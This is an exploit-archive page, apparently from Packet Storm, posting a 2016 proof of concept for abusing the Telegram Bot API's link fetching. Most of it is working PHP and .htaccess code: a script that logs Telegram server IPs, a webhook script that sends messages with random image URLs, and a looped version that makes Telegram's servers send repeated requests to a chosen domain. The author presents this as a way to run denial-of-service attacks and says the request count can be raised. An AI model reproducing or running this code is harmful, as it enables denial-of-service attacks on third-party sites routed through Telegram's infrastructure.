what you don't know can hurt you

Telegram Bot API Cross Site Request Forgery / Denial Of Service

Telegram Bot API Cross Site Request Forgery / Denial Of Service
Posted Aug 15, 2016
Authored by 4L1R3Z4

A cross site request forgery vulnerability in the Telegram Bot API can allow for denial of service attacks.

tags | exploit, denial of service, info disclosure, csrf
MD5 | 64297ed3dab411f1c63fa2afe6521ab2

Telegram Bot API Cross Site Request Forgery / Denial Of Service

Change Mirror Download
# Exploit Title : Telegram Bot API CSRF Vulnerability and use it as a ddoser
# Exploit Author : 4L1R3Z4
# Date : 2016/08/15
# Google Dork : No
# Home Page : https://core.telegram.org/bots/api
# Category : Web Application
# Discovered by : 4L1R3Z4
==============================
# Description :
==============================
In new version of telegram bot api, a new object called "MessageEntity" permits you that send Urls as
message. By this object, We can achieve GET request from telegram server.
Telegram doesn't check that the image is real or not, and also it doesn't have a captcha or securtiy token
so we can run our php files through Telegram Server
==============================
# Proof Of Concepts :
==============================
In this section, I'll show you that how you can grab telegram Server IP
create a folder named "tg" on your host and create a .htaccess file in that with the following contents:
-------------
ErrorDocument 404 /tg/log.php
-------------
And this is the "log.php":
--------------------------------------------
<?php
function getUserIP()
{
$client = @$_SERVER['HTTP_CLIENT_IP'];
$forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
$remote = $_SERVER['REMOTE_ADDR'];
if(filter_var($client, FILTER_VALIDATE_IP))
{
$ip = $client;
}
elseif(filter_var($forward, FILTER_VALIDATE_IP))
{
$ip = $forward;
}
else
{
$ip = $remote;
}
return $ip. PHP_EOL;
}
$user_ip = getUserIP();
$logfile= 'log.txt';
$fp = fopen($logfile, "a");
fwrite($fp, $user_ip, strlen($user_ip));
fclose($fp);
?>
----------------------------------------------
and a file called "request.php" with this contets:
-----------------------
<?php
function random_string($length) {
$key = '';
$keys = array_merge(range(0, 9), range('a', 'z'));
for ($i = 0; $i < $length; $i++) {
$key .= $keys[array_rand($keys)];
}
return $key;
}
$update = json_decode(file_get_contents('php://input'));
$rep=json_decode(file_get_contents("https://api.telegram.org/bot[YOUR BOT Token]/SendMessage?chat_id=".$update->message->chat->id."&parse_mode=HTML&text=".urldecode("<a href=\"https://YOUR HOST.com/tg/".random_string(50).".png\">".'test'."</a>")));
?>
-------------------------
Then activate WebHook for you bot and set the "request.php" address for web hook,
Then, Send a message to your bot, if you do everything right, the IP will write on "log.txt" file


************
************ Exploiting it to ddos
************

Change request.php with this:
--------------------------------------------
<?php
function random_string($length) {
$key = '';
$keys = array_merge(range(0, 9), range('a', 'z'));
for ($i = 0; $i < $length; $i++) {
$key .= $keys[array_rand($keys)];
}
return $key;
}
$update = json_decode(file_get_contents('php://input'));
for($i=0;$i<100;$i++){
$rep=json_decode(file_get_contents("https://api.telegram.org/bot[YOUR BOT Token]/SendMessage?chat_id=".$update->message->chat->id."&parse_mode=HTML&text=".urldecode("<a href=\"https://YOUR HOST.com/tg/".random_string(50).".png\">".'test'."</a>")));
}
?>
--------------------------------------------

and change log.php with this:

--------------------------------------------
<?php
echo file_get_contents("http://exampledomain.com");
?>
---------------------------------------------

This code will send 100 requests to "exampledomain.com" from telegram IP
You can increase or decrease the request numbers depending on your server features
Also you can exploit it through IRC servers if your server is not strong.


Exploited by 4L1R3Z4
Login or Register to add favorites

File Archive:

March 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    19 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    0 Files
  • 5
    Mar 5th
    0 Files
  • 6
    Mar 6th
    0 Files
  • 7
    Mar 7th
    0 Files
  • 8
    Mar 8th
    0 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    0 Files
  • 12
    Mar 12th
    0 Files
  • 13
    Mar 13th
    0 Files
  • 14
    Mar 14th
    0 Files
  • 15
    Mar 15th
    0 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close